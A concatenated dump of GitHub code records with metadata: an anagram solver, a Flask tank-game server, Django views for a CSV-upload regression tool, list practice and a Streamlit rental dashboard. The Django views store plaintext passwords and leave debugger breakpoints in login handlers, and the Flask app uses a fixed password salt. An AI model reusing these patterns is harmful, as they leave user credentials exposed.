HTMLResponse(content=ret)", "repo_name": "waiyankyawsdk/frontiir_learn", "sub_path": "LearnTutopointFirst/4-html-response.py", "file_name": "4-html-response.py", "file_ext": "py", "file_size_in_byte": 228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 3, "usage_type": "call"}, {"api_name": "fastapi.responses.HTMLResponse", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "16289347705", "text": "from collections import defaultdict\n\n\ndef groupAnagrams(strs):\n anagram_map = defaultdict(list)\n for s in strs:\n sorted_s = ''.join(sorted(s))\n anagram_map[sorted_s].append(s)\n return list(anagram_map.values())\n\n\nif __name__ == '__main__':\n assert(groupAnagrams([\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"])) == [[\"eat\",\"tea\",\"ate\"],[\"tan\",\"nat\"],[\"bat\"]]", "repo_name": "willyg42/LeetCode", "sub_path": "AmazonTopQuestions/ArraysAndStrings/groupAnagrams.py", "file_name": "groupAnagrams.py", "file_ext": "py", "file_size_in_byte": 376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.defaultdict", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "30529018653", "text": "# -*- coding: utf-8 -*-\r\n\r\nimport argon2, json, math, os, sys, time\r\n\r\nfrom sqlalchemy.orm import joinedload\r\n\r\nfrom flask import flash, redirect, render_template, request\r\n\r\nfrom .auth import *\r\nfrom ..database import (\r\n Match,\r\n MatchFrame,\r\n TankFrame,\r\n MatchTanks,\r\n FrameUpdates,\r\n Users,\r\n db,\r\n)\r\nfrom ..game_server import entry\r\n\r\n\r\ndef url_for_safe(*args, **kwargs):\r\n try:\r\n return url_for(*args, **kwargs)\r\n except:\r\n return \"\"\r\n\r\n\r\ndef render(*args, **kwargs):\r\n return render_template(\r\n *args, **kwargs, user=user, url_for_safe=url_for_safe\r\n )\r\n\r\n\r\n@app.route(\"/\")\r\ndef serve_root():\r\n return render(\"index.html\"), 200\r\n\r\n\r\n@app.route(\"/submit\", methods=[\"GET\"])\r\ndef serve_submit_page():\r\n if not user:\r\n return redirect(\"/\"), 303\r\n else:\r\n return render(\"submit.html\", code=user.code or \"\"), 200\r\n\r\n\r\n@app.route(\"/submit\", methods=[\"POST\"])\r\ndef accept_submission():\r\n if not user:\r\n flash(\"You are not logged in.\", category=\"ERROR\")\r\n return redirect(\"/\"), 303\r\n\r\n if request.form.get(\"switch\") == \"on\":\r\n file = request.files[\"file\"]\r\n code = file.read()\r\n else:\r\n code = request.form[\"code\"]\r\n user.code = code\r\n db.session.commit()\r\n flash(\"Code submitted!\", category=\"SUCCESS\")\r\n return render(\"submit.html\", code=user.code or \"\"), 200\r\n\r\n\r\n@app.route(\"/signin\", methods=[\"GET\"])\r\ndef serve_signin_page():\r\n return render(\"signin.html\"), 200\r\n\r\n\r\n@app.route(\"/signin\", methods=[\"POST\"])\r\ndef handle_signin_request():\r\n username = request.form[\"username\"]\r\n password = request.form[\"password\"]\r\n\r\n u = Users.query.filter_by(username=username).first()\r\n if u is None:\r\n flash(\"Username and password don't match.\", category=\"ERROR\")\r\n return render(\"signin.html\"), 200\r\n elif argon2.argon2_hash(password, username + \"abcdefgh\") != u.password:\r\n flash(\"Username and password don't match.\", category=\"ERROR\")\r\n return render(\"signin.html\"), 200\r\n else:\r\n set_user(u)\r\n flash(\"Welcome back!\", category=\"SUCCESS\")\r\n return redirect(\"/\"), 
303\r\n\r\n\r\n@app.route(\"/signup\", methods=[\"GET\"])\r\ndef serve_signup_page():\r\n return render(\"signup.html\"), 200\r\n\r\n\r\n@app.route(\"/signup\", methods=[\"POST\"])\r\ndef handle_signup_request():\r\n username = request.form[\"username\"]\r\n password = request.form[\"password\"]\r\n\r\n if password != request.form[\"rpassword\"]:\r\n flash(\"Passwords don't match.\", category=\"ERROR\")\r\n return render(\"signup.html\"), 200\r\n elif Users.query.filter_by(username=username).count() > 0:\r\n flash(\"Username is already taken.\", category=\"ERROR\")\r\n return render(\"signup.html\"), 200\r\n else:\r\n user = Users(\r\n username=username,\r\n password=argon2.argon2_hash(password, username + \"abcdefgh\"),\r\n )\r\n db.session.add(user)\r\n db.session.commit()\r\n set_user(user)\r\n flash(\"Welcome! Your account has been created.\", category=\"SUCCESS\")\r\n return redirect(\"/\"), 303\r\n\r\n\r\n@app.route(\"/signout\")\r\ndef handle_signout_request():\r\n set_user(None)\r\n flash(\"Goodbye!\", category=\"SUCCESS\")\r\n return redirect(\"/\"), 303\r\n\r\n\r\n@app.route(\"/userlist\")\r\ndef serve_userlist():\r\n return render(\r\n \"userlist.html\", users=Users.query.filter(Users.code != None).all()\r\n )\r\n\r\n\r\n@app.route(\"/challenge/\")\r\ndef challenge(id):\r\n if not user:\r\n flash(\"You must be signed in!\", category=\"ERROR\")\r\n return redirect(\"/signin\"), 303\r\n else:\r\n u = Users.query.filter_by(id=id).first()\r\n if u is None:\r\n flash(\"Opponent does not exist!\", category=\"ERROR\")\r\n return redirect(\"/userlist\"), 303\r\n elif user.id == id:\r\n flash(\"You cannot challenge yourself!\", category=\"ERROR\")\r\n return redirect(\"/userlist\"), 303\r\n elif not u.code.strip():\r\n flash(\r\n \"You cannot challenge someone who hasn't submitted code!\",\r\n category=\"ERROR\",\r\n )\r\n return redirect(\"/userlist\"), 303\r\n else:\r\n match = Match(blue_uid=user.id, red_uid=u.id)\r\n db.session.add(match)\r\n db.session.commit()\r\n\r\n entry.run(match.id)\r\n return render(\"challenge.html\", match=match.id, target=u), 200\r\n\r\n\r\n@app.route(\"/replay-viewer/\")\r\ndef replay_viewer(mid):\r\n match = Match.query.filter_by(id=mid).first_or_404()\r\n return (\r\n render(\r\n \"replay-viewer.html\",\r\n match=mid,\r\n frames=MatchFrame.query.filter_by(mid=mid).count(),\r\n ),\r\n 200,\r\n )\r\n\r\n\r\n@app.route(\"/match-data/\")\r\ndef match_data(mid):\r\n match = Match.query.filter_by(id=mid).first()\r\n red_tanks = MatchTanks.query.filter_by(mid=match.id, colour=\"RED\").all()\r\n blue_tanks = MatchTanks.query.filter_by(mid=match.id, colour=\"BLUE\").all()\r\n\r\n match_frames = (\r\n MatchFrame.query.filter_by(mid=mid)\r\n .order_by(MatchFrame.frame_no)\r\n .options(joinedload(\"tank_frames\"), joinedload(\"frame_updates\"))\r\n .all()\r\n )\r\n\r\n def format_frame_for_team(tanks, enemy, f):\r\n ret = []\r\n\r\n for t in tanks:\r\n tf = TankFrame.query.with_parent(f).filter_by(mtid=t.id).first()\r\n updates = (\r\n FrameUpdates.query.with_parent(f).filter_by(mtid=t.id).all()\r\n )\r\n\r\n angle = -1\r\n ability = -1\r\n\r\n for update in updates:\r\n if update.action == \"FIRE\":\r\n target = enemy[int(update.data)]\r\n target_frame = (\r\n TankFrame.query.with_parent(f)\r\n .filter_by(mtid=target.id)\r\n .first()\r\n )\r\n angle = math.atan2(\r\n target_frame.pos_y - tf.pos_y,\r\n target_frame.pos_x - tf.pos_x,\r\n )\r\n elif update.action == \"ABILITY\":\r\n if tf.tank.type in [\r\n \"artillery\",\r\n \"assassin\",\r\n \"shield\",\r\n 
\"kamikaze\",\r\n \"scout\",\r\n ]:\r\n ability = 0\r\n elif tf.tank.type == \"mortar\":\r\n ability = json.loads(update.data)\r\n elif tf.tank.type in [\"repair\", \"hack\"]:\r\n ability = int(update.data)\r\n\r\n ret.append(\r\n [\r\n tf.pos_x,\r\n tf.pos_y,\r\n tf.health,\r\n angle,\r\n tf.ability_cd,\r\n ability,\r\n [y for x, y in [(tf.shielded, \"shielded\")] if x],\r\n ]\r\n )\r\n\r\n return ret\r\n\r\n return json.dumps(\r\n [\r\n [],\r\n [match.red_user.username, match.blue_user.username],\r\n [\r\n [rt.type for rt in red_tanks],\r\n [bt.type for bt in blue_tanks],\r\n ],\r\n [\r\n [\r\n format_frame_for_team(red_tanks, blue_tanks, f),\r\n format_frame_for_team(blue_tanks, red_tanks, f),\r\n ]\r\n for f in match_frames\r\n ],\r\n ]\r\n )\r\n\r\n\r\n@app.route(\"/users\")\r\ndef handle_users():\r\n users = Users.query.filter(Users.code != None).all()\r\n print(users)\r\n return render(\"users.html\", users=users), 200\r\n\r\n\r\n@app.route(\"/battle\", methods=[\"POST\"])\r\ndef handle_battle():\r\n pass\r\n\r\n\r\n@app.errorhandler(404)\r\ndef not_found(e):\r\n return render(\"404.html\"), 404\r\n\r\n\r\n@app.errorhandler(500)\r\ndef internal_server_error(e):\r\n return render(\"500.html\"), 500\r\n", "repo_name": "Riolku/tank-game", "sub_path": "src/tank_game/server/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "database.db.session.commit", "line_number": 60, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 60, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "database.Users.query.filter_by", "line_number": 75, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 75, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 77, "usage_type": "call"}, {"api_name": "argon2.argon2_hash", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 85, "usage_type": 
"call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 96, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 96, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 99, "usage_type": "call"}, {"api_name": "database.Users.query.filter_by", "line_number": 101, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 101, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 102, "usage_type": "call"}, {"api_name": "database.Users", "line_number": 105, "usage_type": "call"}, {"api_name": "argon2.argon2_hash", "line_number": 107, "usage_type": "call"}, {"api_name": "database.db.session.add", "line_number": 109, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 109, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 109, "usage_type": "name"}, {"api_name": "database.db.session.commit", "line_number": 110, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 110, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 112, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 120, "usage_type": "call"}, {"api_name": "database.Users.query.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 126, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 126, "usage_type": "name"}, {"api_name": "database.Users.code", "line_number": 126, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 134, "usage_type": "call"}, {"api_name": "database.Users.query.filter_by", "line_number": 136, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 136, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 138, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 148, "usage_type": "call"}, {"api_name": "database.Match", "line_number": 150, "usage_type": "call"}, {"api_name": "database.db.session.add", "line_number": 151, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 151, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 151, "usage_type": "name"}, {"api_name": "database.db.session.commit", "line_number": 152, "usage_type": "call"}, {"api_name": "database.db.session", "line_number": 152, "usage_type": "attribute"}, {"api_name": "database.db", "line_number": 152, "usage_type": "name"}, {"api_name": "game_server.entry.run", "line_number": 154, 
"usage_type": "call"}, {"api_name": "game_server.entry", "line_number": 154, "usage_type": "name"}, {"api_name": "database.Match.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "database.Match.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "database.Match", "line_number": 160, "usage_type": "name"}, {"api_name": "database.MatchFrame.query.filter_by", "line_number": 165, "usage_type": "call"}, {"api_name": "database.MatchFrame.query", "line_number": 165, "usage_type": "attribute"}, {"api_name": "database.MatchFrame", "line_number": 165, "usage_type": "name"}, {"api_name": "database.Match.query.filter_by", "line_number": 173, "usage_type": "call"}, {"api_name": "database.Match.query", "line_number": 173, "usage_type": "attribute"}, {"api_name": "database.Match", "line_number": 173, "usage_type": "name"}, {"api_name": "database.MatchTanks.query.filter_by", "line_number": 174, "usage_type": "call"}, {"api_name": "database.MatchTanks.query", "line_number": 174, "usage_type": "attribute"}, {"api_name": "database.MatchTanks", "line_number": 174, "usage_type": "name"}, {"api_name": "database.MatchTanks.query.filter_by", "line_number": 175, "usage_type": "call"}, {"api_name": "database.MatchTanks.query", "line_number": 175, "usage_type": "attribute"}, {"api_name": "database.MatchTanks", "line_number": 175, "usage_type": "name"}, {"api_name": "database.MatchFrame.query.filter_by", "line_number": 178, "usage_type": "call"}, {"api_name": "database.MatchFrame.query", "line_number": 178, "usage_type": "attribute"}, {"api_name": "database.MatchFrame", "line_number": 178, "usage_type": "name"}, {"api_name": "database.MatchFrame.frame_no", "line_number": 179, "usage_type": "attribute"}, {"api_name": "database.MatchFrame", "line_number": 179, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.joinedload", "line_number": 180, "usage_type": "call"}, {"api_name": "database.TankFrame.query.with_parent", "line_number": 188, "usage_type": "call"}, {"api_name": "database.TankFrame.query", "line_number": 188, "usage_type": "attribute"}, {"api_name": "database.TankFrame", "line_number": 188, "usage_type": "name"}, {"api_name": "database.FrameUpdates.query.with_parent", "line_number": 190, "usage_type": "call"}, {"api_name": "database.FrameUpdates.query", "line_number": 190, "usage_type": "attribute"}, {"api_name": "database.FrameUpdates", "line_number": 190, "usage_type": "name"}, {"api_name": "database.TankFrame.query.with_parent", "line_number": 200, "usage_type": "call"}, {"api_name": "database.TankFrame.query", "line_number": 200, "usage_type": "attribute"}, {"api_name": "database.TankFrame", "line_number": 200, "usage_type": "name"}, {"api_name": "math.atan2", "line_number": 204, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 218, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 236, "usage_type": "call"}, {"api_name": "database.Users.query.filter", "line_number": 257, "usage_type": "call"}, {"api_name": "database.Users.query", "line_number": 257, "usage_type": "attribute"}, {"api_name": "database.Users", "line_number": 257, "usage_type": "name"}, {"api_name": "database.Users.code", "line_number": 257, "usage_type": "attribute"}]} +{"seq_id": "13261583294", "text": "from django.shortcuts import render, redirect\nfrom Openml.models import Member, Csv, Values \nfrom django.core.files.storage import FileSystemStorage \nimport pdb\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom django.http 
import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\n\ndef index(request):\n if request.method == 'POST':\n if Member.objects.filter(username=request.POST['username'], password=request.POST['password']).exists():\n context = {'sm':'username already exists give another one'}\n return render(request,'index.html',context)\n else: \n member = Member(username=request.POST['username'], password=request.POST['password'], firstname=request.POST['firstname'], lastname=request.POST['lastname'])\n member.save()\n return redirect('login/')\n else:\n return render(request, 'index.html')\n \ndef login(request):\n if request.method == 'GET':\n return render(request, 'login.html')\n elif request.method == 'POST':\n if Member.objects.filter(username=request.POST['username'], password=request.POST['password']).exists():\n #member = Member.objects.get(username=request.POST['username'], password=request.POST['password'])\n pdb.set_trace()\n return redirect('/upload/csv') \n else:\n context = {'msg': 'Invalid username or password'}\n return render(request, 'login.html', context) \n\ndef handle_uploaded_file(f):\n with open('/home/gups/workingdir/ML_using_Django/ML/Openml/uploaded_file/save.csv', 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk) \n \ndef upload_csv(request):\n if request.method=='POST':\n form = Csv(request.POST,request.FILES)\n f= request.FILES['filename'] \n handle_uploaded_file(f) \n reading_csv(f)\n context={'msg':'upload done'} \n return render(request, 'upload_csv.html',context)\n else:\n return render(request, 'upload_csv.html')\n\ndataset = None\ndef reading_csv(f):\n global dataset\n dataset = pd.read_csv('/home/gups/workingdir/ML_using_Django/ML/Openml/uploaded_file/save.csv')\n \n\n \ndef xy(request):\n if request.method == 'GET':\n x = request.GET.get('x')\n y = request.GET.get('y')\n x=int(x)\n y=int(y)\n create_matrix(x,y) \n context = {'x': x, 'y': y}\n return render(request,'upload_csv.html', context)\n\n\ndef create_matrix(x,y):\n global dataset,X,Y,bx\n if x == 1:\n x=1\n else:\n x=x-1\n\n y=y-1\n bx=x\n X=dataset.iloc[:,:x].values\n pdb.set_trace()\n Y=dataset.iloc[:,y:].values\n\ndef missing_values(request):\n global X\n imputer = SimpleImputer(missing_values=np.nan, strategy='mean')\n imputer.fit(X[:,:])\n X[:,:] = imputer.transform(X[:,:])\n context = {'mv' : 'Done'}\n return render(request,'upload_csv.html',context)\n\n \ndef train_test(request):\n global X,Y,X_train, X_test, y_train, y_test\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 1/3, random_state = 0)\n context = {'tt':'Train and test data got Created'}\n return render(request,'upload_csv.html',context)\n\ndef slr(request):\n global X_train,y_train,regressor\n from sklearn.linear_model import LinearRegression\n regressor = LinearRegression()\n regressor.fit(X_train, y_train)\n context = {'slr':'Model prepared for test'}\n return render(request,'train_model.html',context)\n\ndef prediction(request):\n global X_test,y_pred,regressor\n y_pred = regressor.predict(X_test) \n context = {'y_pred': y_pred}\n return render(request,'train_model.html',context) \n\ndef visual_traindata(request):\n global X_train,y_train,regressor\n plt.scatter(X_train, y_train, color = 'red')\n plt.plot(X_train, 
regressor.predict(X_train), color = 'blue')\n plt.title('Salary vs Experience (Training set)')\n plt.xlabel('Years of Experience')\n plt.ylabel('Salary')\n plt.savefig('Train.png', dpi=200)\n image_data = open(\"/home/gups/workingdir/ML_using_Django/ML/Train.png\", \"rb\").read()\n return HttpResponse(image_data, content_type=\"image/png\")\n\ndef visual_testdata(request):\n global X_train,y_train,regressor,X_test, y_test\n plt.scatter(X_test, y_test, color = 'red')\n plt.plot(X_train, regressor.predict(X_train), color = 'blue')\n plt.title('Salary vs Experience (Test set)')\n plt.xlabel('Years of Experience')\n plt.ylabel('Salary')\n plt.savefig('Test.png', dpi=220)\n image_data = open(\"/home/gups/workingdir/ML_using_Django/ML/Test.png\", \"rb\").read()\n return HttpResponse(image_data, content_type=\"image/png\")\n\ndef train_model(request):\n return render(request,'train_model.html')\n\ndef categorical_data(request):\n global X,dataset,colname,x1,xn\n if request.method == 'GET':\n a = request.GET.get('a')\n qn = int(a)\n qn = qn-2\n colname = dataset.columns[qn]\n x1=dataset[colname]\n xn=x1.nunique()\n ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [qn])], remainder='passthrough')\n pdb.set_trace()\n X = np.array(ct.fit_transform(X))\n pdb.set_trace()\n context = {'a': a}\n return render(request,'upload_csv.html', context)\n\ndef Feature_Scaling(request):\n global X_train,X_test,xn\n if request.method == 'GET':\n m = request.GET.get('m')\n n = request.GET.get('n')\n m=int(m)\n n1=int(n)\n m=(m+xn)-3\n n1=(n1+xn-2)+1\n pdb.set_trace()\n sc = StandardScaler()\n X_train[:,m:n1] = sc.fit_transform(X_train[:,m:n1])\n pdb.set_trace()\n X_test[:,m:n1] = sc.transform(X_test[:,m:n1]) \n context={'msg' : 'Done'}\n return render(request,'train_model.html',context)\n", "repo_name": "guneshprasads/ML_using_Django", "sub_path": "ML/Openml/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Openml.models.Member.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "Openml.models.Member.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "Openml.models.Member", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "Openml.models.Member", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "Openml.models.Member.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "Openml.models.Member.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Openml.models.Member", "line_number": 32, "usage_type": "name"}, {"api_name": "pdb.set_trace", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "Openml.models.Csv", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 59, "usage_type": 
"call"}, {"api_name": "django.shortcuts.render", "line_number": 71, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 89, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 99, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 106, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 109, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 151, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 156, "usage_type": "call"}, {"api_name": "pdb.set_trace", 
"line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 168, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 170, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "36214524650", "text": "list_1 = [1, 2, 3, 4, 5, 5, 4, 2, 6, 7]\n\nlist_2 = [5, 6, 7, 8]\n\nprint(type(list_1))\n\nset_1 = set(list_1)\n\nprint(set_1, list_1)\n\nprint(list_1.extend(list_2))\nname = \"sdcsdcsdcsd\"\n\nfrom collections import deque\n\nlist_3 = deque(list_2)\nprint(type(list_3))\nlist_3.append(56)\nlist_3.popleft()\n\nsquares = []\n\nfor x in range(2, 10):\n squares.append(x ** 2)\nprint(squares)\n\nsquares = list(x ** 2 for x in range(10))\n\nprint(squares)\n\nsquares = list((x, y) for x in [1, 2, 3] for y in [4, 5, 6])\n\nn = ['hhcsd', \"csdcsdc\", \"dcsdcdsc\"], [1, 2, 5]\nprint(n)\n\nquestions = ['name', 'quest', 'favorite color']\nanswers = ['lancelot', 'the holy grail', 'blue']\nfor q, a in zip(questions, answers):\n print('What is your {0}? It is {1}.'.format(q, a))\n\nfor x in range(2, 52, 5):\n print(x)\n\n\na = list(range(10))\n\nprint(a)\n\nsquares = list(map(lambda x: x ** 2, range(10)))\nprint(squares)\n\n\n\n", "repo_name": "13671148038/pyghonbase", "sub_path": "zhixingshidai/day2/list.py", "file_name": "list.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "26332667203", "text": "import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\n\nst.set_page_config(layout=\"wide\")\n\nst.title('Sample of Vancouver rentals')\n\ndf1 = pd.read_csv('dataset.csv')\nfeat = ['price','livingArea','bedrooms','bathrooms','url','address/zipcode','address/streetAddress','latitude','longitude']\ndf1 = df1[feat]\n#df1 = df1[df1['price']<8000]\n#df1 = df1[df1['livingArea']<4000]\n\n#st.write(df1)\n\n#maxbedrooms = st.slider('hour', 0, 6, 3) # min: 0, max: 3, default: 3\n\n\ncol1, col2 = st.columns([2,2])\n\nmaxprice = col1.slider('Max price:', 1500, 12000, 8000) # min: 1500, max: 12000, default: 8000\nmaxarea = col1.slider('Max living area:', 300, 5000, 2000)\n\ndf = df1[df1['price'] <= maxprice]\ndf = df[df['livingArea'] <= maxarea]\ndf[\"bedrooms\"] = df[\"bedrooms\"].astype(str)\nfig = px.scatter(df, x=\"livingArea\", y=\"price\",color=\"bedrooms\", trendline=\"ols\",color_discrete_sequence=px.colors.qualitative.Antique,trendline_scope=\"overall\")\n\n#fig = px.scatter(df1, x=\"livingArea\", y=\"price\",color=\"bedrooms\", trendline=\"ols\",color_discrete_sequence=px.colors.qualitative.Antique,trendline_scope=\"overall\")\ncol1.plotly_chart(fig,theme=None)\n\n\nif col2.checkbox('Show map'):\n #st.subheader('Map of Vancouver rentals')\n col2.map(df)\n\n", "repo_name": "GCristianD/Vancouver", "sub_path": "VancouverStreamLit.py", "file_name": "VancouverStreamLit.py", "file_ext": "py", "file_size_in_byte": 1255, "program_lang": "python", "lang": "en", 